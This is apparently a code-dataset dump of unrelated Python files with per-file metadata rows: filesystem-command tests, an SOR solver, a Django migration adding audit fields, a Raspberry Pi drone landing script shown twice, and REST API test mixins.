self.assertDirsAreNotPresent(backup)
# create a new file in source and destination
new_file_name = "12345678901234567890123456"
(new_file, _, _) = self.provideFile(
os.path.join(destination, new_file_name))
shutil.copy2(new_file,
self.joinPath(os.path.join(source, new_file_name)))
self.assertDirsEqual(source, destination)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"dir",
destination,
"file",
self.backup_ending,
hash_source,
))
self.assertDirsArePresent(source)
self.assertDirsAreNotPresent(backup, destination)
class FileCommandGenericTests(FileSystemTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.backup_ending = "_BACK"
def test_hash_file_not_found(self):
self.provideDirectory("test")
self.assertRaisesRegex(
ValueError,
"The given path .* is not a file",
client.shorthand.hash_file,
self.joinPath("test"),
)
def test_hash_dir_not_found(self):
self.provideFile("test")
self.assertRaisesRegex(
ValueError,
"The given path .* is not a directory",
client.shorthand.hash_directory,
self.joinPath("test"),
)
def test_filesystem_move_source_not_exists_wrong_type_dir(self):
(source, _, _) = self.provideFile("test.abc")
destination = self.joinPath("test.abc.link")
self.assertFilesArePresent(source)
self.assertFilesAreNotPresent(destination)
self.assertRaisesRegex(
ValueError,
"source path .* is not a directory",
self.loop.run_until_complete,
client.command.filesystem_move(
source,
"dir",
destination,
"file",
self.backup_ending,
),
)
self.assertFilesArePresent(source)
self.assertFilesAreNotPresent(destination)
def test_filesystem_move_source_not_exists_wrong_type_file(self):
source = self.provideDirectory("test.abc")
destination = self.joinPath("test.abc.link")
self.assertDirsArePresent(source)
self.assertFilesAreNotPresent(destination)
self.assertRaisesRegex(
ValueError,
"source path .* is not a file",
self.loop.run_until_complete,
client.command.filesystem_move(
source,
"file",
destination,
"file",
self.backup_ending,
),
)
self.assertDirsArePresent(source)
self.assertFilesAreNotPresent(destination)
def test_filesystem_wrong_source_type_object(self):
self.assertRaisesRegex(
ValueError,
"source_type",
self.loop.run_until_complete,
client.command.filesystem_restore("file.txt", "none", "ende",
"file", "string", "hash"),
)
def test_filesystem_wrong_destination_type_object(self):
self.assertRaisesRegex(
ValueError,
"destination_type",
self.loop.run_until_complete,
client.command.filesystem_restore("file.txt", "file", "ende",
"none", "string", "hash"),
)
| 32.494656
| 80
| 0.554172
| 3,717
| 42,568
| 6.133441
| 0.074792
| 0.053952
| 0.044916
| 0.040004
| 0.881437
| 0.868146
| 0.84718
| 0.829239
| 0.817177
| 0.793052
| 0
| 0.006043
| 0.350827
| 42,568
| 1,309
| 81
| 32.519481
| 0.818955
| 0.005943
| 0
| 0.793372
| 0
| 0
| 0.072512
| 0.015025
| 0
| 0
| 0
| 0.000764
| 0.158869
| 1
| 0.064327
| false
| 0
| 0.015595
| 0.001949
| 0.087719
| 0.003899
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9ad0acaed9bc39aa3a73fbb1c2c0cddfbff94b0a
| 1,879
|
py
|
Python
|
src/func/solve_matrix.py
|
wakky927/Computational-Engineering-B
|
3720d96668a32dc73f38ed0bc8afe4705452de9e
|
[
"MIT"
] | 1
|
2021-05-03T09:11:35.000Z
|
2021-05-03T09:11:35.000Z
|
src/func/solve_matrix.py
|
wakky927/Computational-Engineering-B
|
3720d96668a32dc73f38ed0bc8afe4705452de9e
|
[
"MIT"
] | null | null | null |
src/func/solve_matrix.py
|
wakky927/Computational-Engineering-B
|
3720d96668a32dc73f38ed0bc8afe4705452de9e
|
[
"MIT"
] | null | null | null |
import numpy as np
from numba import jit
@jit
def SOR1(md, p, ap, ae, aw, bb, m, p_exact, relax_factor):
eps = 1e-15 # convergence criterion
error1, error2, error3 = 0, 0, 0 # initialize parameters
p_old = np.zeros(md + 1)
''' SOR algorithm '''
iter_n = 1
while True:
error1 = 0 # error reset
error2 = 0
error3 = 0
for i in range(1, m + 1): # step increase
p_old[i] = p[i]
for i in range(1, m + 1):
p_diff = -p_old[i] + (bb[i] - ae[i] * p_old[i + 1] - aw[i] * p[i - 1]) / ap[i]
p[i] = p_old[i] + p_diff * relax_factor
error1 = max(error1, abs(p[i] - p_old[i]))
error2 = max(error2, abs(p[i] - p_exact[i]))
error3 = max(error3, abs(p_diff))
if error1 < eps:
break
elif iter_n > 5000:
break
else:
iter_n += 1
return iter_n, error1, error2, error3
@jit
def SOR3(md, p, ap, ae, aw, bb, m, p_exact, relax_factor):
eps = 1e-15 # convergence criterion
error1, error2, error3 = 0, 0, 0 # initialize parameters
p_old = np.zeros(md + 1)
''' SOR algorithm '''
iter_n = 1
while True:
error1 = 0 # error reset
error2 = 0
error3 = 0
for i in range(1, m + 1): # step increase
p_old[i] = p[i]
for i in range(1, m + 1):
p_diff = -p_old[i] + (bb[i] - ae[i] * p_old[i + 1] - aw[i] * p[i - 1]) / ap[i]
p[i] = p_old[i] + p_diff * relax_factor
error1 = max(error1, abs(p[i] - p_old[i]))
error2 = max(error2, abs(p[i] - p_exact[i]))
error3 = max(error3, abs(p_diff))
if error3 < eps:
break
elif iter_n > 5000:
break
else:
iter_n += 1
return iter_n, error1, error2, error3
| 24.402597
| 90
| 0.491219
| 290
| 1,879
| 3.065517
| 0.196552
| 0.035996
| 0.056243
| 0.040495
| 0.926884
| 0.926884
| 0.926884
| 0.926884
| 0.926884
| 0.926884
| 0
| 0.066496
| 0.375732
| 1,879
| 76
| 91
| 24.723684
| 0.69139
| 0.073976
| 0
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.038462
| 0
| 0.115385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9ad3dade1dad31c3a996e1bafc837051bc282c45
| 9,914
|
py
|
Python
|
django/electric_power_sale/migrations/0009_auto_20220312_0221.py
|
zcjwin/hasura-django-auth
|
fd052bb05f051ee7fdaecf9433d5f6d7db580ca9
|
[
"MIT"
] | null | null | null |
django/electric_power_sale/migrations/0009_auto_20220312_0221.py
|
zcjwin/hasura-django-auth
|
fd052bb05f051ee7fdaecf9433d5f6d7db580ca9
|
[
"MIT"
] | 1
|
2022-03-21T03:04:31.000Z
|
2022-03-21T03:04:31.000Z
|
django/electric_power_sale/migrations/0009_auto_20220312_0221.py
|
zcjwin/hasura-django-auth
|
fd052bb05f051ee7fdaecf9433d5f6d7db580ca9
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.12 on 2022-03-12 02:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import electric_power_sale.models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('electric_power_sale', '0008_contract_is_active'),
]
operations = [
migrations.AddField(
model_name='agent',
name='updated_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
),
migrations.AddField(
model_name='agent',
name='updated_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
),
migrations.AddField(
model_name='contract',
name='updated_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
),
migrations.AddField(
model_name='contract',
name='updated_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
),
migrations.AddField(
model_name='contractline',
name='created_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='录入时间'),
),
migrations.AddField(
model_name='contractline',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='录入人'),
),
migrations.AddField(
model_name='contractline',
name='updated_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
),
migrations.AddField(
model_name='contractline',
name='updated_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
),
migrations.AddField(
model_name='customer',
name='created_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='录入时间'),
),
migrations.AddField(
model_name='customer',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='录入人'),
),
migrations.AddField(
model_name='customer',
name='updated_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
),
migrations.AddField(
model_name='customer',
name='updated_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
),
migrations.AddField(
model_name='mthadjust',
name='updated_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
),
migrations.AddField(
model_name='mthadjust',
name='updated_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
),
migrations.AddField(
model_name='mthagentbill',
name='updated_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
),
migrations.AddField(
model_name='mthagentbill',
name='updated_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
),
migrations.AddField(
model_name='mthagentbillline',
name='created_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='录入时间'),
),
migrations.AddField(
model_name='mthagentbillline',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='录入人'),
),
migrations.AddField(
model_name='mthagentbillline',
name='updated_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
),
migrations.AddField(
model_name='mthagentbillline',
name='updated_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
),
migrations.AddField(
model_name='mthcustomerbill',
name='updated_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
),
migrations.AddField(
model_name='mthcustomerbill',
name='updated_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
),
migrations.AddField(
model_name='mthcustomerbillline',
name='created_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='录入时间'),
),
migrations.AddField(
model_name='mthcustomerbillline',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='录入人'),
),
migrations.AddField(
model_name='mthcustomerbillline',
name='updated_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
),
migrations.AddField(
model_name='mthcustomerbillline',
name='updated_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
),
migrations.AddField(
model_name='mthdiffcustomerbill',
name='updated_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
),
migrations.AddField(
model_name='mthdiffcustomerbill',
name='updated_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
),
migrations.AddField(
model_name='mthdiffcustomerbillline',
name='created_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='录入时间'),
),
migrations.AddField(
model_name='mthdiffcustomerbillline',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='录入人'),
),
migrations.AddField(
model_name='mthdiffcustomerbillline',
name='updated_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
),
migrations.AddField(
model_name='mthdiffcustomerbillline',
name='updated_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
),
migrations.AddField(
model_name='mthdraftcustomerbill',
name='updated_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
),
migrations.AddField(
model_name='mthdraftcustomerbill',
name='updated_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
),
migrations.AddField(
model_name='mthdraftcustomerbillline',
name='created_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='录入时间'),
),
migrations.AddField(
model_name='mthdraftcustomerbillline',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='录入人'),
),
migrations.AddField(
model_name='mthdraftcustomerbillline',
name='updated_at',
field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
),
migrations.AddField(
model_name='mthdraftcustomerbillline',
name='updated_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
),
]
| 47.663462
| 160
| 0.649788
| 1,048
| 9,914
| 5.871183
| 0.06584
| 0.111165
| 0.142045
| 0.166748
| 0.951893
| 0.951893
| 0.951893
| 0.852592
| 0.852592
| 0.852592
| 0
| 0.002636
| 0.234618
| 9,914
| 207
| 161
| 47.89372
| 0.80825
| 0.00464
| 0
| 0.945274
| 1
| 0
| 0.116765
| 0.021387
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019901
| 0
| 0.034826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b143f41933b36ec80a58296066fc4e91d9ae7f86
| 7,611
|
py
|
Python
|
examples/detect_Dat.py
|
datwwe/dronecontrol-MAVSDK
|
85d68de9b085832801de5acc77a6eb875613290c
|
[
"BSD-3-Clause"
] | null | null | null |
examples/detect_Dat.py
|
datwwe/dronecontrol-MAVSDK
|
85d68de9b085832801de5acc77a6eb875613290c
|
[
"BSD-3-Clause"
] | null | null | null |
examples/detect_Dat.py
|
datwwe/dronecontrol-MAVSDK
|
85d68de9b085832801de5acc77a6eb875613290c
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
import asyncio
from mavsdk import System
import io
import time
import picamera
from PIL import Image
from detect_img import detect_img
from yolo import YOLO
import math
import json
from mavsdk import (OffboardError, PositionNedYaw)
with open('/home/pi/Downloads/MAVSDK-Python/examples/connect.json','r') as f:
aa = json.load(f)
def image_generator(camera):
while(True):
stream = io.BytesIO()
camera.capture(stream, format='jpeg')
stream.seek(0)
image = Image.open(stream)
yield image
def calculate_distance(result, helipad_edge, image_width, image_height):
image_center_x = int(image_width/2)
iamge_center_y = int(image_height/2)
helipad = result['helipad']
if helipad is not None:
delta_x = helipad['center_x'] - image_center_x
delta_y = -(helipad['center_y'] - iamge_center_y)
size = max(helipad['width'], helipad['height'])
ratio = helipad_edge / size
actual_delta_x = delta_x * ratio
actual_delta_y = delta_y * ratio
angle =math.degrees(math.atan(delta_y/delta_x))
return {
'actual_delta_x':actual_delta_x,
'actual_delta_y':actual_delta_y,
'angle': angle
}
return None
async def print_flight_mode(yolo, helipad_edge, image_width, image_height ):
drone = System()
await drone.connect(system_address=aa['address'])
print("Waiting for drone to connect...")
async for state in drone.core.connection_state():
if state.is_connected:
print(f"Drone discovered with UUID: {state.uuid}")
break
async for flight_mode in drone.telemetry.flight_mode():
print("FlightMode:{}|||||||||".format(flight_mode))
if str(flight_mode) == "HOLD":
await asyncio.sleep(10)
break
print("-- Setting initial setpoint")
await drone.offboard.set_position_ned(PositionNedYaw(0.0, 0.0, 0.0, 0.0))
print("-- Starting offboard")
try:
await drone.offboard.start()
except OffboardError as error:
print(f"Starting offboard mode failed with error code: {error._result.result}")
print("-- Disarming")
await drone.action.disarm()
return
with picamera.PiCamera() as camera:
camera.resolution = (640, 480)
camera.start_preview()
count =0
for image in image_generator(camera):
print('image' + str(count) +'.jpg')
image.save('./video/test' + str(count)+'.jpg','jpeg')
# image = Image.open('./video/outputframe2.jpg')
count+=1
result = detect_img(yolo,image)
result = calculate_distance(result, helipad_edge, image_width, image_height)
if result is not None:
print(result)
print("-- Go 0m North, 10m East, 0m Down within local coordinate system, turn to face South")
await drone.offboard.set_position_ned(PositionNedYaw(result['actual_delta_x'], result['actual_delta_y'], 0.0, 0.0))
await asyncio.sleep(10)
print("-- Stopping offboard")
try:
await drone.offboard.stop()
except OffboardError as error:
print(f"Stopping offboard mode failed with error code: {error._result.result}")
await drone.action.land()
await asyncio.sleep(5)
break
print(result)
# if count ==3:
# break
if __name__ == "__main__":
yolo = YOLO()
HELIPAD_EDGE = 0.562
IMAGE_WIDTH = 640
IMAGE_HEGIHT = 480
loop = asyncio.get_event_loop()
loop.run_until_complete(print_flight_mode(yolo, HELIPAD_EDGE, IMAGE_WIDTH,IMAGE_HEGIHT))
#!/usr/bin/env python3
import asyncio
from mavsdk import System
import io
import time
import picamera
from PIL import Image
from detect_img import detect_img
from yolo import YOLO
import math
import json
from mavsdk import (OffboardError, PositionNedYaw)
with open('/home/pi/Downloads/MAVSDK-Python/examples/connect.json','r') as f:
aa = json.load(f)
def image_generator(camera):
while(True):
stream = io.BytesIO()
camera.capture(stream, format='jpeg')
stream.seek(0)
image = Image.open(stream)
yield image
def calculate_distance(result, helipad_edge, image_width, image_height):
image_center_x = int(image_width/2)
iamge_center_y = int(image_height/2)
helipad = result['helipad']
if helipad is not None:
delta_x = helipad['center_x'] - image_center_x
delta_y = -(helipad['center_y'] - iamge_center_y)
size = max(helipad['width'], helipad['height'])
ratio = helipad_edge / size
actual_delta_x = delta_x * ratio
actual_delta_y = delta_y * ratio
angle =math.degrees(math.atan(delta_y/delta_x))
return {
'actual_delta_x':actual_delta_x,
'actual_delta_y':actual_delta_y,
'angle': angle
}
return None
async def print_flight_mode(yolo, helipad_edge, image_width, image_height ):
drone = System()
await drone.connect(system_address=aa['address'])
print("Waiting for drone to connect...")
async for state in drone.core.connection_state():
if state.is_connected:
print(f"Drone discovered with UUID: {state.uuid}")
break
async for flight_mode in drone.telemetry.flight_mode():
print("FlightMode:{}|||||||||".format(flight_mode))
if str(flight_mode) == "HOLD":
await asyncio.sleep(10)
break
print("-- Setting initial setpoint")
await drone.offboard.set_position_ned(PositionNedYaw(0.0, 0.0, 0.0, 0.0))
print("-- Starting offboard")
try:
await drone.offboard.start()
except OffboardError as error:
print(f"Starting offboard mode failed with error code: {error._result.result}")
print("-- Disarming")
await drone.action.disarm()
return
with picamera.PiCamera() as camera:
camera.resolution = (640, 480)
camera.start_preview()
count =0
for image in image_generator(camera):
print('image' + str(count) +'.jpg')
image.save('./video/test' + str(count)+'.jpg','jpeg')
# image = Image.open('./video/outputframe2.jpg')
count+=1
result = detect_img(yolo,image)
result = calculate_distance(result, helipad_edge, image_width, image_height)
if result is not None:
print(result)
print("-- Go 0m North, 10m East, 0m Down within local coordinate system, turn to face South")
await drone.offboard.set_position_ned(PositionNedYaw(result['actual_delta_x'], result['actual_delta_y'], 0.0, 0.0))
await asyncio.sleep(10)
print("-- Stopping offboard")
try:
await drone.offboard.stop()
except OffboardError as error:
print(f"Stopping offboard mode failed with error code: {error._result.result}")
await drone.action.land()
await asyncio.sleep(5)
break
print(result)
# if count ==3:
# break
if __name__ == "__main__":
yolo = YOLO()
HELIPAD_EDGE = 0.562
IMAGE_WIDTH = 640
IMAGE_HEGIHT = 480
loop = asyncio.get_event_loop()
loop.run_until_complete(print_flight_mode(yolo, HELIPAD_EDGE, IMAGE_WIDTH,IMAGE_HEGIHT))
| 36.242857
| 131
| 0.619629
| 944
| 7,611
| 4.811441
| 0.161017
| 0.008807
| 0.010568
| 0.010568
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.016257
| 0.272632
| 7,611
| 209
| 132
| 36.416268
| 0.804191
| 0.024176
| 0
| 0.98913
| 0
| 0
| 0.16069
| 0.032354
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021739
| false
| 0
| 0.119565
| 0
| 0.173913
| 0.163043
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b15718493a2e2753707b6f903fb7161858346b35
| 20,986
|
py
|
Python
|
zc_common/remote_resource/test_mixins.py
|
ZeroCater/common
|
28569037df93fc17336d7fdafe1318401b426331
|
[
"MIT"
] | 2
|
2016-02-26T19:49:24.000Z
|
2017-04-04T18:36:43.000Z
|
zc_common/remote_resource/test_mixins.py
|
ZeroCater/common
|
28569037df93fc17336d7fdafe1318401b426331
|
[
"MIT"
] | 68
|
2016-03-24T00:10:22.000Z
|
2021-03-19T21:49:22.000Z
|
zc_common/remote_resource/test_mixins.py
|
ZeroCater/common
|
28569037df93fc17336d7fdafe1318401b426331
|
[
"MIT"
] | 5
|
2016-04-29T19:02:17.000Z
|
2020-01-29T03:03:31.000Z
|
import ujson
import datetime
import dateutil.parser
from inflection import camelize
from rest_framework import status
from rest_framework.reverse import reverse
from .tests import USER, STAFF
class ResourceCreateTestCase(object):
def test_create__valid_data_incorrect_header(self):
url = reverse(self.resource_view_name)
response = self.client_post_auth(url, user_role=self.USER_ROLE,
data=self.json_request, content_type='application/json')
self.failure_response_structure_test(response, status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)
def test_create__empty_request(self):
url = reverse(self.resource_view_name)
response = self.client_post_auth(url, user_role=self.USER_ROLE,
data={}, content_type='application/vnd.api+json')
self.failure_response_structure_test(response, status.HTTP_400_BAD_REQUEST)
def test_create__missing_required_parameters(self):
if not self.required_params:
return True
url = reverse(self.resource_view_name)
self.create_json_format['data']['attributes'] = {'random_key': 'This is a random value'}
missing_parameters_request = ujson.dumps(self.create_json_format)
response = self.client_post_auth(url, user_role=self.USER_ROLE,
data=missing_parameters_request, content_type='application/vnd.api+json')
self.failure_response_structure_test(response, status.HTTP_400_BAD_REQUEST)
def test_create__without_relationships(self):
if not self.relationship_keys:
return True
url = reverse(self.resource_view_name)
self.create_json_format['data']['relationships'] = {}
no_relationships_request = ujson.dumps(self.create_json_format)
response = self.client_post_auth(url, user_role=self.USER_ROLE,
data=no_relationships_request, content_type='application/vnd.api+json')
self.failure_response_structure_test(response, status.HTTP_400_BAD_REQUEST)
def test_create__with_malformed_relationship_data(self):
if not self.relationship_keys:
return True
url = reverse(self.resource_view_name)
key = camelize(self.relationship_keys[0], False)
self.create_json_format['data']['relationships'][key]['data'] = {
# No type provided
'id': '1234'}
empty_relationships_request = ujson.dumps(self.create_json_format)
response = self.client_post_auth(url, user_role=self.USER_ROLE, data=empty_relationships_request,
content_type='application/vnd.api+json')
self.failure_response_structure_test(response, status.HTTP_400_BAD_REQUEST)
def test_create__post_non_json_data_correctly_errors(self):
url = reverse(self.resource_view_name)
response = self.client_post_auth(url, user_role=self.USER_ROLE,
data='invalid_JSON_obj', content_type='application/vnd.api+json')
self.failure_response_structure_test(response, status.HTTP_400_BAD_REQUEST)
def test_create__unauthorized(self):
url = reverse(self.resource_view_name)
response = self.client_post_auth(url, data=self.json_request, content_type='application/vnd.api+json')
self.failure_response_structure_test(response, status.HTTP_401_UNAUTHORIZED)
class ResourceCreateWithoutPermissionTestCase(object):
def test_create__valid_data_incorrect_header(self):
url = reverse(self.resource_view_name)
response = self.client_post_auth(url, user_role=self.USER_ROLE,
data=self.json_request, content_type='application/json')
self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
def test_create__empty_request(self):
url = reverse(self.resource_view_name)
response = self.client_post_auth(url, user_role=self.USER_ROLE,
data={}, content_type='application/vnd.api+json')
self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
def test_create__missing_required_parameters(self):
if not self.required_params:
return True
url = reverse(self.resource_view_name)
self.create_json_format['data']['attributes'] = {'random_key': 'This is a random value'}
missing_parameters_request = ujson.dumps(self.create_json_format)
response = self.client_post_auth(url, user_role=self.USER_ROLE,
data=missing_parameters_request, content_type='application/vnd.api+json')
self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
def test_create__without_relationships(self):
if not self.relationship_keys:
return True
url = reverse(self.resource_view_name)
self.create_json_format['data']['relationships'] = {}
no_relationships_request = ujson.dumps(self.create_json_format)
response = self.client_post_auth(url, user_role=self.USER_ROLE,
data=no_relationships_request, content_type='application/vnd.api+json')
self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
def test_create__with_malformed_relationship_data(self):
if not self.relationship_keys:
return True
url = reverse(self.resource_view_name)
key = camelize(self.relationship_keys[0], False)
self.create_json_format['data']['relationships'][key]['data'] = {
# No type provided
'id': '1234'}
empty_relationships_request = ujson.dumps(self.create_json_format)
response = self.client_post_auth(url, user_role=self.USER_ROLE, data=empty_relationships_request,
content_type='application/vnd.api+json')
self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
def test_create__post_non_json_data_correctly_errors(self):
url = reverse(self.resource_view_name)
response = self.client_post_auth(url, user_role=self.USER_ROLE,
data='invalid_JSON_obj', content_type='application/vnd.api+json')
self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
def test_create__unauthorized(self):
url = reverse(self.resource_view_name)
response = self.client_post_auth(url, data=self.json_request, content_type='application/vnd.api+json')
self.failure_response_structure_test(response, status.HTTP_401_UNAUTHORIZED)
class ResourceUpdateTestCase(object):
def get_patch_response(self, request_data):
user_id = getattr(getattr(self.resource, 'user', None), 'id', None)
return self.client_patch_auth(
reverse(self.resource_view_name, args=(self.resource.id,)),
user_role=self.USER_ROLE,
user_id=user_id,
company_permissions=getattr(self, 'company_permissions', {}),
data=ujson.dumps(request_data),
content_type='application/vnd.api+json'
)
def test_update__resource(self):
attribute_name = self.attributes[0]
new_attribute_value = self.new_attribute_values[0]
update_data = self.patch_request_stub
update_data['data']['attributes'] = {attribute_name: new_attribute_value}
response = self.get_patch_response(update_data)
self.success_response_structure_test(response, status.HTTP_200_OK)
setattr(self.resource, attribute_name, new_attribute_value)
self.validate_instance_in_response(response, self.resource, self.attributes,
relationship_keys=self.relationship_keys)
db_obj = self.resource_class.objects.get(id=self.resource.id)
db_value = getattr(db_obj, attribute_name)
if isinstance(db_value, datetime.datetime):
new_attribute_value = dateutil.parser.parse(new_attribute_value)
elif isinstance(db_value, datetime.date):
new_attribute_value = new_attribute_value.isoformat()
elif isinstance(db_value, datetime.time):
new_attribute_value = new_attribute_value.isoformat()
self.assertEqual(db_value, new_attribute_value)
def test_update__incorrect_type(self):
attribute_name = self.attributes[0]
new_attribute_value = self.new_attribute_values[0]
update_data = self.patch_request_stub
update_data['data']['type'] = 'RandomType'
update_data['data']['attributes'] = {attribute_name: new_attribute_value}
response = self.get_patch_response(update_data)
self.failure_response_structure_test(response, status.HTTP_409_CONFLICT)
def test_update__multiple_fields(self):
if len(self.new_attribute_values) < 2:
return True
attribute_name_1 = self.attributes[0]
new_attribute_value_1 = self.new_attribute_values[0]
attribute_name_2 = self.attributes[1]
new_attribute_value_2 = self.new_attribute_values[1]
update_data = self.patch_request_stub
update_data['data']['attributes'] = {
attribute_name_1: new_attribute_value_1,
attribute_name_2: new_attribute_value_2
}
response = self.get_patch_response(update_data)
setattr(self.resource, attribute_name_1, new_attribute_value_1)
setattr(self.resource, attribute_name_2, new_attribute_value_2)
self.success_response_structure_test(response, status.HTTP_200_OK)
self.validate_instance_in_response(response, self.resource, self.attributes,
relationship_keys=self.relationship_keys)
db_obj = self.resource_class.objects.get(id=self.resource.id)
self.assertEqual(getattr(db_obj, attribute_name_1), new_attribute_value_1)
self.assertEqual(getattr(db_obj, attribute_name_2), new_attribute_value_2)
def test_update__missing_item_404(self):
attribute_name = self.attributes[0]
new_attribute_value = self.new_attribute_values[0]
update_data = self.patch_request_stub
update_data['data']['id'] = 12457
update_data['data']['attributes'] = {attribute_name: new_attribute_value}
response = self.client_patch_auth(
reverse(self.resource_view_name, args=(12457,)),
user_role=self.USER_ROLE,
data=ujson.dumps(update_data),
content_type='application/vnd.api+json'
)
self.failure_response_structure_test(response, status.HTTP_404_NOT_FOUND)
def test_update__unauthorized(self):
attribute_name = self.attributes[0]
new_attribute_value = self.new_attribute_values[0]
update_data = self.patch_request_stub
update_data['data']['attributes'] = {attribute_name: new_attribute_value}
response = self.client_patch_auth(
reverse(self.resource_view_name, args=(self.resource.id,)),
data=ujson.dumps(update_data),
content_type='application/vnd.api+json'
)
